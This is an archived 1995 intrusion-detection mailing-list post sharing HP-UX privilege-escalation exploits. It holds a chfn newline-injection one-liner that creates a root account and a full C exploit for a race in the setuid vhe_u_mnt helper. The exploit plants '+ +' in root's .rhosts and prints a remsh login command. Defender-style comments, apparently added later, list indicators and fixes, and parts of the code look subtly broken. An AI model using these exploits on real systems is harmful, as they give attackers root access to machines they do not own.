[90] in Intrusion Detection Systems


Re: HP-UX Explotation/Repair/Info scripts

daemon@ATHENA.MIT.EDU (Andrew Prendergast)
Fri May 5 23:08:42 1995

Date: Sat, 6 May 1995 10:13:39 +1000
To: ids@uow.edu.au
From: ap@ozonline.com.au (Andrew Prendergast)
Reply-To: ids@uow.edu.au

>To: sysec@BIX.com
>From: ap@www.ozonline.com.au (Andrew Prendergast)
>Subject: Re: HP-UX Explotation/Repair/Info scripts
>Cc: 
>Bcc: 
>X-Attachments: 
>
>>I will soon be changing some SunOS platforms to HP-UX and I feel lost
>>from the security point of view, which I always studied on the Sun machines.
>>I would like, if possible, any kind of exploitation scripts, detailed
>>information, etc. about existing HP bugs. HP folks say not to worry,
>>"HP-UX is the most secure"; I don't believe them...
>>Any help will be very appreciated..
>>
>>
>Here's a start.
>
>HP/UX (below 7.0) - chfn problem - chfn accepts newlines, etc...
>
>% chfn -f looser^Mrewt::0:0::/:/bin/sh
>% rlogin localhost -l rewt
>Warning: .lastlogin not found.
>#
>
>On the HP security list?
>Check this out for info...
>-------------------------------------------------------------------------------
>
>To obtain a copy of the HP SupportLine mail service user's guide, send the
>following (in the TEXT PORTION OF THE MESSAGE to) to the HP SupportLine mail
>service.
>
>To: support@support.mayfield.hp.com
>
>Message Text:
>
> send guide.txt
>
>-------------------------------------------------------------------------------
>
>Here's an exploit script - work it out yourself...
>/***
> *
> * HP-UX /usr/etc/vhe/vhe_u_mnt bug exploit.
> *
> * This bug is exhibited in all versions of HP-UX that contain
> * /usr/etc/vhe/vhe_u_mnt setuid to root.
> *
> * This program written by pluvius@io.org
> * The exploit code itself written by misar@rbg.informatik.th-darmstadt.de
> *
> * I found that the exploit code didn't always work due to a race between
> * the child and the parent, and that a link() called failed due to
> * the fact that user directories and the /tmp are in different file systems
> * so you must create a symlink.
> * I added in a call to alarm() so that the timing between the two processes
> * is ok..
> *
> ***/
>#include <stdio.h>
>#include <stdlib.h>
>#include <pwd.h>
>#include <string.h>
>#include <unistd.h>
>#include <signal.h>
>#include <netdb.h>
>#include <sys/wait.h>
>#include <sys/stat.h>
>#include <sys/utsname.h>
>
>#define BUGGY_PROG "/usr/etc/vhe/vhe_u_mnt"
>#define NAME "<defunct>"
>
>/* Returns non-zero only when uname() reports sysname "HP-UX".
> * The return value of uname() itself is not checked, so on failure
> * the comparison runs against whatever is left in `name`. */
>int test_host()
>{ struct utsname name;
>   uname(&name);
>   return !strcmp(name.sysname,"HP-UX");
>}
>/* Returns non-zero when BUGGY_PROG exists and carries the setuid bit
> * (the double negation below is just `(st_mode & S_ISUID) == S_ISUID`).
> * Defender note: that bit is the entire precondition this tool needs,
> * so clearing it on the helper removes the exposure; an audit of setuid
> * files under /usr/etc is the cheap way to confirm. */
>int check_mount()
>{ struct stat my_buf;
>   if (stat(BUGGY_PROG, &my_buf))
>      return 0;
>   return !((my_buf.st_mode & S_ISUID) != S_ISUID);
>}
>/* SIGALRM handler that only re-installs itself; no other state is
> * touched. Pre-ANSI style: the signal number parameter is not declared. */
>void pause_handler()
>{
>   signal(SIGALRM,pause_handler);
>}
>/* Attempts to get "+ +\n" appended to <home of `user`>/.rhosts through the
> * setuid helper named in BUGGY_PROG, and reports success purely by
> * comparing the file's st_size before and after (non-zero = size changed).
> * Exits with -3 when `user` is not in the password database.
> *
> * Defender / forensic notes, all visible in the code below:
> *  - it leaves /tmp/vhe_<n> and a /tmp/newmnt<n> symlink that points into a
> *    user home directory -- both are host-level indicators;
> *  - the payoff is a "+ +" line in ~root/.rhosts or ~bin/.rhosts, which any
> *    integrity check on those files (or disabling rhosts trust) catches;
> *  - the original poster notes the timing is unreliable, so repeated
> *    invocations of the helper in quick succession are another signal.
> * Historical 1995-era HP-UX code; the K&R prototype style is original. */
>int rhost_user(user)
>char *user;
>{
>  struct passwd *info;
>  char   homedir[80];
>  int fd[2];
>  int procno;
>  struct stat my_buf;
>  int fsize;
>
>   info = getpwnam(user);
>   if (info==NULL) {
>      fprintf(stderr,"ERROR: Unknown user %s\n",user);
>      exit(-3);
>   }
>   /* homedir is a fixed 80-byte buffer; pw_dir is copied in unchecked. */
>   strcpy(homedir,info->pw_dir);
>   if (homedir[strlen(homedir)-1] != '/')
>      strcat(homedir,"/");
>   strcat(homedir,".rhosts");
>
>   signal(SIGALRM,pause_handler);
>   memset(my_buf,0,sizeof(my_buf));
>   stat(homedir,&my_buf);
>   /* baseline size of .rhosts; the only success criterion (see return) */
>   fsize = my_buf.st_size;
>
>   /* now the exploit code... slightly modified.. but mostly from the source */
>   /* by misar@rbg.informatik.th-darmstadt.de                                */
>   pipe(fd);
>   if (!(procno=fork())) {
>      /* child: stdin comes from the pipe, stdout/stderr are closed */
>      close(0);
>      dup(fd[0]);
>      close(fd[1]);
>      close(1);
>      close(2);
>      alarm(2); /* wait for other process */
>      nice(5);
>      execl(BUGGY_PROG,NAME,NULL);
>   } else {
>    FILE *out;
>    char listfile[25];
>    char mntfile[25];
>    struct stat dummy;
>
>      /* parent: writes to the pipe, then creates the /tmp artifacts
>       * named below -- these paths are the detection indicators. */
>      close(1);
>      dup(fd[1]);
>      close(fd[0]);
>      write(1,"+\n",2);
>      sprintf(listfile,"/tmp/vhe_%d",procno+2);
>      sprintf(mntfile,"/tmp/newmnt%d",procno+2);
>      while (stat(listfile,&dummy));
>      unlink(listfile);
>      out=fopen(listfile,"w");
>      fputs("+ +\n",out);
>      fclose(out);
>      unlink(mntfile);
>      symlink(homedir,mntfile);
>      waitpid(procno,NULL,0);
>   }
>   stat(homedir,&my_buf);
>   return (fsize != my_buf.st_size);
>}
>
>/* Entry point. Refuses to run unless uname() says HP-UX (exit -1) and the
> * helper is present and setuid (exit -2); then calls rhost_user("root") up
> * to five times, falls back once to "bin" (exit -4 if that also fails), and
> * finally prints a `remsh localhost -l <user>` hint.
> * Defender note: the login path the hint relies on is host-based trust via
> * a "+ +" .rhosts entry; disabling rhosts trust for remshd/rlogind limits the
> * consequence even on a host where the helper is still setuid.
> * argc/argv are never read; `void main` and the K&R parameter list are
> * original to the 1995 posting. */
>void main(argc,argv)
>int   argc;
>char *argv[];
>{
>  int i;
>  int rhost_root = 0;
>  char userid[10];
>
>   if (!test_host()) {
>      fprintf(stderr,"ERROR: This bug is only exhibited by HP-UX\n");
>      exit(-1);
>   }
>
>   if (!check_mount()) {
>      fprintf(stderr,
>              "ERROR: %s must exist and be setuid root to exploit this bug\n",
>              BUGGY_PROG);
>      exit(-2);
>   }
>
>   /* up to five attempts; the poster's own comment says the timing is racy */
>   for (i=0;(i<5)&&(!rhost_root);i++) {
>      fprintf(stderr,"Attempting to .rhosts user root..");
>      if (!rhost_user("root")) {
>         fprintf(stderr,"failed.\n");
>      } else {
>         fprintf(stderr,"succeeded\n");
>         rhost_root = 1;
>      }
>   }
>
>   if (!rhost_root) {
>      /* failed to rhost root, try user 'bin' */
>      fprintf(stderr,"Too many failures.. trying user bin...");
>      if (!rhost_user("bin")) {
>         fprintf(stderr,"failed.\n");
>         exit(-4);
>      }
>      fprintf(stderr,"succeeded.\n");
>      strcpy(userid,"bin");
>   } {
>      strcpy(userid,"root");
>   }
>   fprintf(stderr,"now type: \"remsh localhost -l %s csh -i\" to login\n",
>           userid);
>}
>
>
>any other contributors?
>
>Andrew Prendergast
>

